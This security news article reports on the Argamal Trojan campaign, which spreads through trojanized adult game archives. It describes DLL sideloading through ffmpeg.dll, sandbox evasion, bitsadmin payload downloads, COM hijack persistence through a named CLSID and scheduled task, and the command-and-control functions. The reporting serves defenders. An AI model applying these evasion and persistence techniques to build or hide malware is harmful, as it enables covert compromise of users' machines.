Argamal Trojan Campaign Targets Adult Gamers with COM Hijacking

A dangerous new electronic threat is currently targeting individuals who download adult video games online. Security researchers recently uncovered a sophisticated distribution network designed to achieve complete system control. Analysts have named this malicious family the Argamal Trojan campaign. According to a technical bulletin, the malware spreads through infected game archives found on torrent sites. Consequently, unsuspecting players face full system compromise and broad remote manipulation. Therefore, users must exercise extreme caution when downloading unverified software packages.

How Attackers Distribute the Malicious Archives

The threat actors utilize popular torrent trackers and catalog websites to share their malicious files. For example, investigators found trojanized packages hosted on specialized platforms like AniRena. These download links often redirect users to free file transfer services. Furthermore, the downloaded archives contain fully functional, legitimate game files alongside hidden threats. Therefore, victims do not realize their computers are in danger when the game launches normally. Additionally, this deceptive blending helps the malware evade initial human suspicion.

Technical Breakdown of the Infiltration Path

Exploiting the Core Media Library

To execute code silently, the attackers patch a standard media processing library. Specifically, the game directory includes a modified version of the ffmpeg.dll file. As a result, the game loads the compromised library immediately at startup. This library then quietly extracts an external data file called natives2_blob.bin. As noted in the official Kaspersky malware analysis:

“Since the game needs ffmpeg.dll to run properly, the library loads as soon as the user starts the game.”

The compromised library subsequently triggers an obfuscated command execution layer.

Initial Environment and Sandbox Evasion

The first execution stage utilizes a customized data wrapper to evaluate the system. Specifically, this file executes a Base64-encoded PowerShell script inside the operating system. First, the script runs strict environmental checks to spot malware analysis tools. For example, it searches the local file system for Sandboxie application folders. It also looks for active process tracking applications like Procmon64. If the script detects a safe environment, it proceeds to establish long-term system access.

Downloading the Final Core Payload

Next, the malware configures a secondary payload downloader script inside user directories. This secondary script connects to GitHub via the legitimate Windows utility bitsadmin.exe. Furthermore, it downloads an encrypted binary asset containing the final Trojan payload. The script then decrypts this asset using advanced cryptographic standards. Finally, the malware prepares to integrate itself deeply into native system behaviors. Consequently, the core Trojan achieves execution readiness without displaying obvious warning signs.

Establishing Persistence via COM Hijacking

To guarantee long-term execution, the Argamal Trojan campaign utilizes advanced registry manipulation techniques. Specifically, the malware targets automated system maintenance tasks. The documentation notes that the decrypted core payload is integrated into the system configuration:

“The decrypted payload is set as InprocServer32 at HKCU\SOFTWARE\Classes\CLSID{B210D694-C8DF-490D-9576-9E20CDBC20BD}, which is a COM object used by the \Microsoft\Windows\WindowsColorSystem\Calibration Loader scheduled task.”

Consequently, this system loader executes the Trojan during every single user session. Therefore, the threat actors maintain remote access without needing custom startup files.

Command and Control Infrastructure Capabilities

Once the infection completes, the payload sends routine network data packets to a remote server. Specifically, the Trojan transmits UDP heartbeats to port 57441 of the command host. These packets contain local information regarding installed security solutions, machine architecture, and active usernames. Furthermore, the operators can issue a wide array of dangerous control commands based on server responses. For instance, the server can trigger file deletions, execute screenshots, and compress local folders into archives. Thus, the threat grants attackers total control over the infected machine.

Global Impact and Attribution Clues

Tracking the Infected Victims

Telemetry data shows that hundreds of unique individuals have already fallen victim to this operation. Geographically, the majority of these targets reside in Russia, Brazil, Germany, and Vietnam. Interestingly, the malware deliberately avoids executing on devices configured with a Chinese user locale. If the script detects a Chinese language setting, it changes its remote address to a local loopback IP.

Spanish Language Identifiers in Code

Furthermore, investigators discovered prominent language clues within the source code framework. The threat actors routinely use Spanish words for internal variables and script comments. For example, the delivery framework utilizes terms like palabra and ajustarAltura. Based on this evidence, this Kaspersky malware analysis assesses with medium confidence that the developer speaks Spanish. Ultimately, this operation proves that threat groups are actively capitalizing on specialized gaming communities to deploy stealthy payloads.